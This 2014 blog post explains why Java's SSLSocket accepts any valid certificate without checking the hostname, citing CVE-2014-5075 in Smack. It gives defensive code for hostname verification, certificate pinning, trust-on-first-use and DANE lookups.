The SSLSocket documentation claims that the socket provides "Integrity Protection", "Authentication", and "Confidentiality", even against active wiretappers. That impression is underscored by rigorous certificate checking performed when connecting, making it ridiculously hard to run development/test installations. However, these checks turn out to be completely worthless against active MitM attackers, because SSLSocket will happily accept any valid certificate (like for a domain owned by the attacker). Due to this, many applications using SSLSocket can be attacked with little effort.

This problem has been written about before, but CVE-2014-5075 shows that it cannot be stressed enough.

Affected Applications

This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), and file transfer (FTP). CVE-2014-5075 is the corresponding vulnerability in the Smack XMPP client library, so that is a good starting point.

XMPP Clients

Vulnerable clients include those based on Smack (which was fixed on 2014-07-22), as well as a number of other XMPP clients.

Not Vulnerable Applications

The following applications have been checked as well, and contained code to compensate for SSLSocket's shortcomings:

  • Jitsi (OSS conferencing client)
  • K9-Mail (Android e-Mail client)
  • Xabber (Based on Smack, but using its own hostname verification)

Background: Security APIs in Java

The number of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offspring). Therefore, this section will cover the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android, and Apache's HttpClient.

Java SE up to and including 1.6

When network security was added to Java 1.4 with the JSSE (and we all know how well security-as-an-afterthought works), two distinct APIs were created: one for certificate verification and one for hostname verification. The rationale for that decision was probably that the TLS/SSL handshake happens at the socket layer, whereas hostname verification depends on the application-level protocol (HTTPS at that time). Therefore, the X509TrustManager class for certificate trust checks was integrated into the low-level SSLSocket and SSLEngine classes, whereas the HostnameVerifier API was only incorporated into HttpsURLConnection.

The API design was not very future-proof either: X509TrustManager's checkClientTrusted() and checkServerTrusted() methods are only passed the certificate and authentication type parameters. There is no reference to the actual SSL connection or its peer name. The only workaround to allow hostname verification through this API is by creating a custom TrustManager for each connection, and storing the peer's hostname in it. This is neither elegant nor does it scale well with multiple connections.
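
To illustrate that workaround, here is a minimal, hypothetical sketch of such a per-connection trust manager: it delegates the PKI check to the platform trust manager and then matches the stored hostname against the certificate's dNSName entries (no wildcard or CN fallback handling, so treat it as a sketch, not production code):

import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Collection;
import java.util.List;
import javax.net.ssl.X509TrustManager;

// Hypothetical: binds one expected hostname to one connection's trust checks.
class HostnameBindingTrustManager implements X509TrustManager {
    private final X509TrustManager platformTm; // performs the normal PKI check
    private final String expectedHost;         // stored per connection

    HostnameBindingTrustManager(X509TrustManager platformTm, String expectedHost) {
        this.platformTm = platformTm;
        this.expectedHost = expectedHost;
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        platformTm.checkServerTrusted(chain, authType); // certificate chain check
        Collection<List<?>> sans = chain[0].getSubjectAlternativeNames();
        if (sans != null) {
            for (List<?> san : sans) {
                // subjectAltName entry type 2 is dNSName
                if (Integer.valueOf(2).equals(san.get(0))
                        && expectedHost.equalsIgnoreCase((String) san.get(1))) {
                    return;
                }
            }
        }
        throw new CertificateException("Certificate does not match " + expectedHost);
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        platformTm.checkClientTrusted(chain, authType);
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return platformTm.getAcceptedIssuers();
    }
}

Note that one such object has to be instantiated for every connection, which is exactly the scaling problem described above.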

The HostnameVerifier, on the other hand, has access to both the hostname and the session, making a full verification possible. However, only HttpsURLConnection makes use of a HostnameVerifier (and only asks it if it determines a mismatch between the peer and its certificate, so the default HostnameVerifier always fails).

Besides the default HostnameVerifier being unusable due to always failing, the API holds another subtle surprise: while the TrustManager methods fail by throwing a CertificateException, HostnameVerifier.verify() simply returns false if verification fails.

As the API designers realized that users of the raw SSLSocket might fall into a certificate verification trap set up by their API, they added a well-buried warning into the JSSE reference guide for Java 5, which I am sure you have read multiple times (or at least printed it and put it under your pillow):

IMPORTANT NOTE: When using raw SSLSockets/SSLEngines you should always check the peer's credentials before sending any data. The SSLSocket/SSLEngine classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.

Of course, URLs are only a thing in HTTPS, but you get the point... provided that you have actually read the reference guide... up to this place. If you only read the SSLSocket marketing reference article and thought you were safe because it does not mention any of the pitfalls: shame on you!

And even if you did read the warning, there is no hint about how to implement the peer credential checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standards*.

* Side note: even if you do not believe the SSL conspiracy theories (or rather, confirmed facts) about the deliberate manipulation of Internet standards by the NSA and GCHQ, there is one prominent example of how the implementation of security mechanisms can be aggravated by adding complexity - the title of RFC 6125: "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".

Apache HttpClient

The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.

The Apache library developers came up with their own API interface for hostname verification, X509HostnameVerifier, which also happens to incorporate Java's HostnameVerifier interface. The new methods added by Apache are expected to throw an SSLException when verification fails, while the old method still returns true or false, of course. It is hard to tell whether this interface mixing adds confusion or reduces it. One way or the other, it results in the appropriate glue code:

public final boolean verify(String host, SSLSession session) {
    try {
        Certificate[] certs = session.getPeerCertificates();
        X509Certificate x509 = (X509Certificate) certs[0];
        verify(host, x509);
        return true;
    }
    catch(SSLException e) {
        return false;
    }
}

Based on that interface, AllowAllHostnameVerifier, BrowserCompatHostnameVerifier, and StrictHostnameVerifier were created, all of which can be plugged into anything expecting a plain HostnameVerifier. The latter two actually perform hostname verification, as opposed to the default verifier in Java, so they can be used wherever appropriate. Their difference is:

The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*.foo.com") with BROWSER_COMPATIBLE matches all subdomains, including "a.b.foo.com".

If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:

sslSocket = ...;
sslSocket.startHandshake();
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
    throw new CertificateException("Server failed to authenticate as " + serviceName);
}
// NOW you can send and receive data!

Android

Android's designers must have been well aware of the shortcomings of the Java implementation, and the problems that an application developer might encounter when testing and debugging. They created the SSLCertificateSocketFactory class, which makes a developer's life really easy:

  1. It is available on all Android devices, starting with API level 1.

  2. It comes with appropriate warnings about its security parameters and limitations:

    Most SSLSocketFactory implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that use InetAddress or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.

  3. It provides developers with two easy ways to disable all security checks for testing purposes: a) a static getInsecure() method (as of API level 8), and b)

    On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.

  4. Uses of the insecure instance are logged via adb:

    Bypassing SSL security checks at caller's request
    

    Or, when the system property is set:

    *** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***
    

Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section for "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:

Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Typos aside, this is very true advice. The article also covers other common SSL/TLS related problems like certificate chaining, self-signed certs and SNI. A must read! The fact that it does not mention the SSLCertificateSocketFactory is only a little snag.

Java 1.7+

As of Java 1.7, there is a new abstract class X509ExtendedTrustManager that finally unifies the two sides of certificate verification:

Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.

To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.

This class extends the checkServerTrusted and checkClientTrusted methods with an additional parameter for the socket reference, allowing the TrustManager to obtain the hostname that was used for the connection, thus making it possible to actually verify that hostname.

To retrofit this into the old X509TrustManager interface, all instances of X509TrustManager are internally wrapped into an AbstractTrustManagerWrapper that performs hostname verification according to the socket's SSLParameters. All this happens transparently; all you need to do is initialize your socket with the hostname and then set the right params:

SSLParameters p = sslSocket.getSSLParameters();
p.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(p);

If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.

However, if you do run the above code, the certificate will be checked against the IP address or hostname that you are connecting to. If the service you are using employs DNS SRV, the hostname (the actual machine you are connecting to, e.g. "xmpp-042.example.com") might differ from the service name (what the user entered, like "example.com"). However, the certificate will be issued for the service name, so the verification will fail. As such protocols are most often combined with STARTTLS, you will need to wrap your SSLSocket around your plain Socket, for which you can use the following code:

sslSocket = sslContext.getSocketFactory().createSocket(
        plainSocket,
        serviceName, /**< set your service name here */
        plainSocket.getPort(),
        true);
// set the socket parameters here!

API Confusion Conclusion

To summarize the different "platforms":

  • If you are on Java 1.6 or earlier, you are screwed!
  • If you have Android, use SSLCertificateSocketFactory and be happy.
  • If you have Apache HttpClient, add a StrictHostnameVerifier.verify() call right after you connect your socket, and check its return value!
  • If you are on Java 1.7 or newer, do not forget to set the right SSLParameters, or you might still be screwed.

Java SSL In the Literature

There is a large amount of good and bad advice out there; you just need to be a farmer (pardon, a security expert) to separate the wheat from the chaff.

Negative Examples

The most expensive advice is free advice. And the Internet is full of it. First, there is code to make Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disabling certificate validation, because all these security exceptions only get in our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still being written. The suggestions are all very similar, and all pretty bad.

Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, anybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effect of this can range from funny through embarrassing up to life-threatening, if you are a journalist in a crisis zone.

The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.

Fortunately, the situation on StackOverflow has been improving over the years. Some time ago, you were overwhelmed with DO_NOT_VERIFY HostnameVerifiers and all-accepting DefaultTrustManagers, where the authors conveniently forgot to mention that their code turns the big red "security" switch to OFF.

The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.

Positive Examples

In 2012, Kevin Locke created a proper HostnameVerifier using the internal sun.security.util.HostnameChecker class, which seems to exist in Java SE 6 and 7. This HostnameVerifier is used with AsyncHttpClient, but it is suitable for other use cases as well.

Fahl et al. analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they found a massive number of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 follow-up, they developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.

Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!

There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.

Mitigation Possibilities

So you are an app developer, and you get this pesky CertificateException you could not care less about. What can you do to get rid of it, in a secure way? That depends on your situation.

Cloud-Connected App: Certificate Pinning

If your app always connects to known-in-advance servers under your control (like only your company's "cloud"), employ Certificate Pinning.

If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with ultimate control over the whole security infrastructure: you do not need to pay certificate extortion fees to greedy CAs, and a compromised commercial CA can not issue certificates that would allow MitM attacks on your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.

To implement the client side, you need to store the CA cert in a key file, which you can use to create an X509TrustManager that will only accept server certificates signed by your CA:

KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(ks);
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new java.security.SecureRandom());
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...

If you prefer to trust the establishment instead (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA in your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.

User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP

In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".

The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.

In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.
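
Translated into Java, a hypothetical TOFU store can be as simple as a fingerprint file per host (the .pin file location and the SHA-256 digest are assumptions of this sketch):

import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.cert.Certificate;
import java.security.cert.CertificateException;

// Hypothetical TOFU helper: remember the certificate's SHA-256 fingerprint on
// first contact, and fail hard if it ever changes afterwards.
class TofuStore {
    static void checkOrPin(String host, Certificate cert) throws Exception {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(cert.getEncoded());
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) hex.append(String.format("%02x", b));
        Path pin = Paths.get(host + ".pin"); // storage location is an assumption
        if (!Files.exists(pin)) {
            // first use: trust the certificate and remember its fingerprint
            Files.write(pin, hex.toString().getBytes(StandardCharsets.UTF_8));
        } else if (!hex.toString().equals(
                new String(Files.readAllBytes(pin), StandardCharsets.UTF_8))) {
            throw new CertificateException("REMOTE HOST IDENTIFICATION HAS CHANGED for " + host);
        }
    }
}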

The problem with the TOFU approach is that it does not mix well with the PKI model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).

With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.

If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key instead, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course, you can create your own self-signed certificate with a ridiculously long expiration time, but this practice is frowned upon (both for the self-signing and for the long expiration time).

Currently, some ideas exist about how to combine PKI with TOFU, but the only sensible thing that an app can do is to give a shrug and ask the user.

Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your app's TLS connections; it leverages the system's certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination legitimate. Internally, MTM uses a key store where it collects all the certificates that the user has permanently accepted.

Browser

If you are developing a browser that is meant to support HTTPS, please stop here, get a security expert into your team, and only go on with her. This article has shown that using TLS is horribly hard even if you can leverage existing components to perform the actual verification of certificates and hostnames. Writing such checks in a browser-compliant way is far beyond the scope of this piece.

Outlook

DNS + TLS = DANE

Besides TOFU/POP, which is not yet ready for TLS primetime, there is an alternative approach to link the server name (in DNS) with the server identity (as represented by its TLS certificate): DNS-based Authentication of Named Entities (DANE).

With this approach, information about the server's TLS certificate can be added to the DNS database, in the form of different certificate constraint records:

  • (0) a CA constraint can require that the presented server certificate MUST be signed by the referenced CA public key, and that this CA must be a known Root CA.
  • (1) a service certificate constraint can define that the server MUST present the referenced certificate, and that certificate must be signed by a known Root CA.
  • (2) a trust anchor assertion is like a CA constraint, except it does not need to be a Root CA known to the client. This allows a server administrator to run their own CA.
  • (3) a domain issued certificate is analogous to a service certificate constraint, but like in (2), there is no need to involve a Root CA.

Multiple constraints can be specified to tighten the checks, encoded in TLSA records (for TLS association). TLSA records are always specific to a given server name and port. For example, to make a secure XMPP connection with "zombofant.net", first the XMPP SRV record (_xmpp-client._tcp) needs to be obtained:

$ host -t SRV _xmpp-client._tcp.zombofant.net
_xmpp-client._tcp.zombofant.net has SRV record 0 0 5222 xmpp.zombofant.net.

Then, the TLSA record(s) for xmpp.zombofant.net:5222 must be obtained:

$ host -t TLSA _5222._tcp.xmpp.zombofant.net     
_5222._tcp.xmpp.zombofant.net has TLSA record 3 0 1 75E6A12CFE74A2230F3578D5E98C6F251AE2043EDEBA09F9D952A4C1 C317D81D

This record reads as: the server is using a domain issued certificate (3) with the full certificate (0) represented via its SHA-256 hash (1): 75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D.

And indeed, if we check the server certificate using openssl s_client, the SHA-256 hash does match:

Subject: CN=zombofant.net
Issuer: O=Root CA, OU=http://www.cacert.org, CN=CA Cert Signing Authority/emailAddress=support@cacert.org
Validity
    Not Before: Apr  8 07:25:35 2014 GMT
    Not After : Oct  5 07:25:35 2014 GMT
SHA256 Fingerprint=75:E6:A1:2C:FE:74:A2:23:0F:35:78:D5:E9:8C:6F:25:1A:E2:04:3E:DE:BA:09:F9:D9:52:A4:C1:C3:17:D8:1D

Of course, this information can only be relied upon if the DNS records are secured by DNSSEC. And DNSSEC can be abused by the same entities that can already manipulate Root CAs and perform large-scale Man-in-the-Middle attacks. However, this kind of attack is made significantly harder: a typical Root CA list contains hundreds of entries, with an unknown number of intermediate CAs each, and it is sufficient to compromise any one of them to screw you. With DNSSEC, the attacker needs to obtain the keys to your domain (zombofant.net), to your top-level domain (.net), or the master root keys (.). In addition to that improvement, another benefit of DANE is that server operators can replace (paid) Root CA services with (cheaper/free) DNS records.

However, there is a long way to go until DANE can be used in Java. Java's own DNS code is very limited (no SRV support; TLSA - what are you dreaming of?). The dnsjava library claims to provide partial DNSSEC verification, there is the unmaintained DNSSEC4j, and the GSoC work-in-progress dnssecjava. All that remains is for somebody to step up and implement a DANETrustManager based on one of these components.

Conclusion

Internet security is hard. Let's go bake some cookies!

Comments on HN

Posted 2014-08-05 19:52